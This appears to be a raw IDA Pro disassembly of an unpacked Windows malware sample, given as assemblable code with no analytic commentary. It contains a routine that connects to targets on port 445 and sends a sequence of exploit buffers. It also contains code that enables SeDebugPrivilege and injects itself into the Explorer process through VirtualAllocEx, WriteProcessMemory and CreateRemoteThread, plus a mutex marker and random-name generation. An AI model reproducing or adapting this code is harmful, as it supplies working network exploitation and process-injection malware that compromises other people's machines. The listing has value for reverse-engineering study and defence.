;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : FB9C5F1F3E5FA175AA525C44F0F09B3A
; File Name : u:\work\fb9c5f1f3e5fa175aa525c44f0f09b3a_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31000000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31001000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31001000 dd 77DD590Bh ; DATA XREF: sub_310022BD+1A�r
dword_31001004 dd 77DD59F0h ; DATA XREF: sub_310022BD+38�r
dword_31001008 dd 77DD23D7h ; DATA XREF: sub_31002264+3E�r
dword_3100100C dd 77DD22EAh ; DATA XREF: sub_3100222F+14�r
; sub_31002264+1D�r
dword_31001010 dd 77DD5C55h ; DATA XREF: sub_3100222F+24�r
dword_31001014 dd 77DD189Ah ; DATA XREF: sub_3100222F+2D�r
; sub_31002264+4E�r ...
dword_31001018 dd 77E2A571h ; DATA XREF: sub_31001E06+10B�r
dword_3100101C dd 77DE089Eh ; DATA XREF: sub_310011FB+17�r
dword_31001020 dd 77DE07A3h ; DATA XREF: sub_310011FB+30�r
dword_31001024 dd 77DE0D79h ; DATA XREF: sub_310011FB+4D�r
dword_31001028 dd 77DE0343h ; DATA XREF: sub_310011FB+5B�r
dword_3100102C dd 77DE0AF0h ; DATA XREF: sub_310011DF+8�r
dword_31001030 dd 77DE042Eh ; DATA XREF: sub_310011DF+12�r
dword_31001034 dd 77DDEBA2h ; DATA XREF: sub_31001190+6�r
dword_31001038 dd 77DE0BB2h ; DATA XREF: sub_31001190+3D�r
align 10h
dword_31001040 dd 77E7513Ch ; DATA XREF: sub_31002A44+29�r
dword_31001044 dd 77E79D8Ch ; DATA XREF: sub_310026A6+ED�r
dword_31001048 dd 77E79E34h ; DATA XREF: sub_31002694+B�r
dword_3100104C dd 77E7980Ah ; DATA XREF: sub_31002680+D�r
dword_31001050 dd 77E7A099h ; DATA XREF: sub_31002542+17�r
dword_31001054 dd 77E76A2Eh ; DATA XREF: sub_31002542+E9�r
dword_31001058 dd 77E704FCh ; DATA XREF: sub_31002476+1B�r
; sub_310026A6+37�r
dword_3100105C dd 77E74155h ; DATA XREF: sub_31002476+40�r
; sub_310026A6+3D�r
dword_31001060 dd 77E6BD13h ; DATA XREF: sub_31002476+71�r
dword_31001064 dd 77E684C6h ; DATA XREF: sub_31002476+B0�r
dword_31001068 dd 77EBB1E7h ; DATA XREF: sub_31002BE8�r
dword_3100106C dd 77EBA595h ; DATA XREF: sub_31002BE2�r
dword_31001070 dd 77E616B4h ; DATA XREF: sub_31002310+9B�r
dword_31001074 dd 77EBA6E9h ; DATA XREF: sub_31002BDC�r
dword_31001078 dd 77E73167h ; DATA XREF: sub_310020F4+13�r
; sub_31002542+8F�r
dword_3100107C dd 77E74672h ; DATA XREF: sub_31001262+253�r
; sub_31001262+272�r ...
dword_31001080 dd 77E61BE6h ; DATA XREF: sub_31001262+16C�r
; sub_31001ADF+E2�r ...
dword_31001084 dd 77E73BEFh ; DATA XREF: sub_31001262+4F�r
dword_31001088 dd 77E79C90h ; DATA XREF: sub_310017C9+4D�r
dword_3100108C dd 77E7A5FDh ; DATA XREF: sub_310017C9+13�r
; sub_31001851+2C�r
dword_31001090 dd 77E805D8h ; DATA XREF: sub_310017C9+D�r
; sub_31001E06+A4�r
dword_31001094 dd 77E61A90h ; DATA XREF: sub_31001851+BC�r
dword_31001098 dd 77E77963h ; DATA XREF: sub_31001851+AA�r
; sub_310019B3+19�r ...
dword_3100109C dd 77E706B7h ; DATA XREF: sub_31001851+8A�r
; sub_31002310+92�r
dword_310010A0 dd 77E79F93h ; DATA XREF: sub_31001851+26�r
; UPX0:31001D8A�r
dword_310010A4 dd 77E7751Ah ; DATA XREF: sub_3100195C+12�r
dword_310010A8 dd 77E7C2C4h ; DATA XREF: sub_3100198A+8�r
dword_310010AC dd 77E7AC37h ; DATA XREF: sub_31001999+12�r
; sub_310019B3+12�r
dword_310010B0 dd 77E61BB8h ; DATA XREF: sub_31001A04+38�r
dword_310010B4 dd 77E74A3Bh ; DATA XREF: sub_31001AAF+13�r
dword_310010B8 dd 77E73AB3h ; DATA XREF: sub_31001AAF+8�r
dword_310010BC dd 77E73C49h ; DATA XREF: sub_31001ADF+12A�r
; sub_31001C18+66�r ...
dword_310010C0 dd 77E78B82h ; DATA XREF: sub_31001C18+92�r
dword_310010C4 dd 77E793EFh ; DATA XREF: sub_31001C18+6E�r
dword_310010C8 dd 77E7A837h ; DATA XREF: sub_31001C18+57�r
; sub_310026A6+8F�r
dword_310010CC dd 77E75CB5h ; DATA XREF: UPX0:31001DC4�r
; sub_31002476+C3�r
dword_310010D0 dd 77F5157Dh ; DATA XREF: UPX0:31001DB5�r
dword_310010D4 dd 77E73628h ; DATA XREF: UPX0:31001D9A�r
; sub_31002476+F�r
dword_310010D8 dd 77E79D5Bh ; DATA XREF: sub_31001DF2+8�r
dword_310010DC dd 77E737DEh ; DATA XREF: sub_31001E06+2D�r
dword_310010E0 dd 77E777EFh ; DATA XREF: sub_31001FA5+3F�r
; sub_3100202D+58�r
align 8
dword_310010E8 dd 77C42D60h ; DATA XREF: sub_31002BD6�r
dword_310010EC dd 77C43500h ; DATA XREF: sub_3100281C+37�r
; sub_31002928+68�r
; ---------------------------------------------------------------------------
loc_310010F0: ; DATA XREF: UPX0:loc_31002BD0�r
mov al, 3Eh
retn
; ---------------------------------------------------------------------------
db 77h
dword_310010F4 dd 77C43AB0h ; DATA XREF: sub_31001ADF:loc_31001B10�r
; sub_31002310+79�r ...
dword_310010F8 dd 77C3528Dh ; DATA XREF: sub_310019D4:loc_310019E5�r
; sub_31001AC9+1�r ...
dword_310010FC dd 77C35280h ; DATA XREF: sub_3100195C+22�r
dword_31001100 dd 77C42E10h ; DATA XREF: sub_31002B98�r
dword_31001104 dd 77C43710h ; DATA XREF: sub_31002B92�r
dword_31001108 dd 77C43490h ; DATA XREF: sub_31002B8C�r
align 10h
dword_31001110 dd 77D4BDCAh ; DATA XREF: sub_31001851+5D�r
dword_31001114 dd 77D4456Bh ; DATA XREF: sub_31001851+67�r
dword_31001118 dd 77D45CBCh ; DATA XREF: sub_31001851+7A�r
dword_3100111C dd 77D4C96Ah ; DATA XREF: sub_31001262+62�r
; sub_31001ADF+8B�r ...
dd 0
dword_31001124 dd 7620BD61h ; DATA XREF: sub_310026A6+DB�r
; sub_31002A44+B3�r
dword_31001128 dd 76214750h ; DATA XREF: sub_310026A6+A9�r
; sub_31002A44+9E�r
dword_3100112C dd 7620AFB6h ; DATA XREF: sub_310026A6+18�r
; sub_31002A44+89�r
dword_31001130 dd 76204E4Dh ; DATA XREF: sub_31002A44+E6�r
dword_31001134 dd 762211EFh ; DATA XREF: sub_31001A99+8�r
; UPX0:31002184�r
dd 0
dword_3100113C dd 71AB41DAh ; DATA XREF: sub_31001D5C+10�r
dword_31001140 dd 71AB3ECEh ; DATA XREF: sub_31001C18+100�r
dword_31001144 dd 71AB5DE2h ; DATA XREF: sub_31001C18+10D�r
dword_31001148 dd 71AB868Dh ; DATA XREF: sub_31001C18+120�r
dword_3100114C dd 71AB32CAh ; DATA XREF: sub_31001A5A+C�r
dword_31001150 dd 71AB1740h ; DATA XREF: sub_31001A5A+17�r
dword_31001154 dd 71AB2BBFh ; DATA XREF: sub_31001A5A+25�r
dword_31001158 dd 71AB3C22h ; DATA XREF: sub_31001262+2B�r
; sub_31001C18+AC�r
dword_3100115C dd 71AB401Ch ; DATA XREF: sub_31001262+44�r
; sub_310020F4+D�r
dword_31001160 dd 71AB1746h ; DATA XREF: sub_31001262+147�r
; sub_31001C18+F0�r
dword_31001164 dd 71AB3E5Dh ; DATA XREF: sub_31001262+15D�r
dword_31001168 dd 71AB1AF4h ; DATA XREF: sub_31001262+17B�r
; sub_31001ADF+67�r ...
dword_3100116C dd 71AB5690h ; DATA XREF: sub_31001262+1A4�r
; sub_31001262+1D8�r ...
dword_31001170 dd 71AB8629h ; DATA XREF: sub_31001262+550�r
; sub_31001ADF+11B�r
dword_31001174 dd 71AB1A6Dh ; DATA XREF: sub_31001262+559�r
; sub_31001ADF+122�r
align 10h
dword_31001180 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_31001E06+5�o
dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
sub_31001190 proc near ; CODE XREF: sub_31002928+BF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31001034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_310011BD
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_310011BD
push 1
pop eax
jmp short loc_310011DB
; ---------------------------------------------------------------------------
loc_310011BD: ; CODE XREF: sub_31001190+19�j
; sub_31001190+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31001038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_310011DB: ; CODE XREF: sub_31001190+2B�j
pop edi
pop esi
pop ebx
retn
sub_31001190 endp
; =============== S U B R O U T I N E =======================================
sub_310011DF proc near ; CODE XREF: sub_31002928+10F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3100102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31001030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_310011DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310011FB proc near ; CODE XREF: sub_31002928+EA�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3100101C ; CryptCreateHash
test eax, eax
jnz short loc_31001221
push 1
pop eax
jmp short loc_3100125E
; ---------------------------------------------------------------------------
loc_31001221: ; CODE XREF: sub_310011FB+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31001020 ; CryptHashData
test eax, eax
jnz short loc_3100123A
push 2
pop edi
jmp short loc_31001253
; ---------------------------------------------------------------------------
loc_3100123A: ; CODE XREF: sub_310011FB+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31001024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_31001253: ; CODE XREF: sub_310011FB+3D�j
push [ebp+arg_0]
call dword_31001028 ; CryptDestroyHash
mov eax, edi
loc_3100125E: ; CODE XREF: sub_310011FB+24�j
pop edi
pop esi
pop ebp
retn
sub_310011FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001262 proc near ; CODE XREF: sub_31001F41+36�p
; sub_31001FA5+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31002BA0
mov eax, dword_310049CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_310049D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31001158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_310017C2
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3100115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_31001084 ; lstrcpyn
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_310049C0
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_310012D5: ; CODE XREF: sub_31001262+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_310012D5
push 60h
lea eax, [ebp+var_E4]
push offset dword_310044E0
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31002B98 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31002B92 ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31002B98 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31002B8C ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31002B8C ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31001160 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31001164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_310017B8
mov esi, dword_31001080
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31001168
push 89h
push offset dword_310042C8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0A8h
push offset dword_31004354
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0DEh
push offset dword_31004400
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
cmp eax, 46h
jl loc_310017AD
cmp [ebp+var_730], 31h
jnz loc_31001658
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31002B8C ; memset
add esp, 0Ch
push offset byte_31004000
call dword_3100107C ; lstrlen
push eax
lea eax, [ebp+var_EA4]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_3100107C ; lstrlen
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31002B98 ; memcpy
mov eax, dword_31004906
add esp, 0Ch
mov [ebp+var_798], eax
loc_310014F9: ; CODE XREF: sub_31001262+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 68h
push offset dword_31004544
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0A0h
push offset dword_310045B0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
cmp [ebp+arg_0], 0
jz loc_31001748
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31004768
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31002B98 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_310047D4
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31002B98 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31004848
push eax
call sub_31002B98 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_310017A0
; ---------------------------------------------------------------------------
loc_31001658: ; CODE XREF: sub_31001262+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31002B8C ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_310049B8
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
add esp, 40h
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_310016F4: ; CODE XREF: sub_31001262+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_310016F4
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31002B8C ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31002B8C ; memset
add esp, 18h
jmp loc_310014F9
; ---------------------------------------------------------------------------
loc_31001748: ; CODE XREF: sub_31001262+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31004654
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31002B98 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_310046D4
push eax
call sub_31002B98 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_310017A0: ; CODE XREF: sub_31001262+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_310017AD: ; CODE XREF: sub_31001262+1AD�j
; sub_31001262+1E1�j ...
push 2
push [ebp+var_4]
call dword_31001170 ; shutdown
loc_310017B8: ; CODE XREF: sub_31001262+166�j
push [ebp+var_4]
call dword_31001174 ; closesocket
pop esi
loc_310017C2: ; CODE XREF: sub_31001262+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31001262 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310017C9 proc near ; CODE XREF: UPX0:loc_31001DCA�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_31001090 ; LoadLibraryA
mov esi, dword_3100108C
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_3100184D
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_3100184D
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_3100184D
lea eax, [ebp+var_C]
push eax
push 20h
call dword_31001088 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_3100184D: ; CODE XREF: sub_310017C9+28�j
; sub_310017C9+37�j ...
pop edi
pop esi
leave
retn
sub_310017C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001851 proc near ; CODE XREF: UPX0:31001DDE�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31004FD0
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_310010A0 ; GetModuleHandleA
mov esi, dword_3100108C
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31001898
loc_31001894: ; CODE XREF: sub_31001851+54�j
push 1
jmp short loc_310018E9
; ---------------------------------------------------------------------------
loc_31001898: ; CODE XREF: sub_31001851+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31001894
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31001110 ; FindWindowA
test eax, eax
jnz short loc_310018C6
call dword_31001114 ; GetForegroundWindow
test eax, eax
jnz short loc_310018C6
push 2
jmp short loc_310018E9
; ---------------------------------------------------------------------------
loc_310018C6: ; CODE XREF: sub_31001851+65�j
; sub_31001851+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31001118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_3100109C ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_310018EC
push 3
loc_310018E9: ; CODE XREF: sub_31001851+45�j
; sub_31001851+73�j
pop eax
jmp short loc_31001957
; ---------------------------------------------------------------------------
loc_310018EC: ; CODE XREF: sub_31001851+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_31001098
test eax, eax
jz short loc_3100194A
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_31001094 ; WriteProcessMemory
push dword_31004FC4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31001936
push eax
call esi ; CloseHandle
jmp short loc_31001951
; ---------------------------------------------------------------------------
loc_31001936: ; CODE XREF: sub_31001851+DE�j
push offset aUterm13 ; "uterm13"
call sub_3100198A
pop ecx
mov [ebp+var_4], 5
jmp short loc_31001951
; ---------------------------------------------------------------------------
loc_3100194A: ; CODE XREF: sub_31001851+B2�j
mov [ebp+var_4], 4
loc_31001951: ; CODE XREF: sub_31001851+E3�j
; sub_31001851+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31001957: ; CODE XREF: sub_31001851+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31001851 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100195C proc near ; CODE XREF: sub_31001C18+B�p
; UPX0:31001DA0�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_310010A4 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_310010FC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_3100195C endp
; =============== S U B R O U T I N E =======================================
sub_3100198A proc near ; CODE XREF: sub_31001851+EA�p
; UPX0:31001DAA�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_310010A8 ; CreateMutexA
retn
sub_3100198A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001999 proc near ; CODE XREF: sub_31001E06+E3�p
; sub_31001E06+EE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_310010AC ; CreateThread
pop ebp
retn
sub_31001999 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310019B3 proc near ; CODE XREF: sub_31001C18+12C�p
; sub_31001FA5+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_310010AC ; CreateThread
push eax
call dword_31001098 ; CloseHandle
pop ebp
retn
sub_310019B3 endp
; =============== S U B R O U T I N E =======================================
sub_310019D4 proc near ; CODE XREF: sub_31002476+3B�p
; sub_31002542+64�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_310019FC
loc_310019E5: ; CODE XREF: sub_310019D4+26�j
call dword_310010F8 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_310019E5
loc_310019FC: ; CODE XREF: sub_310019D4+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_310019D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001A04 proc near ; CODE XREF: sub_310026A6+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31002B8C ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
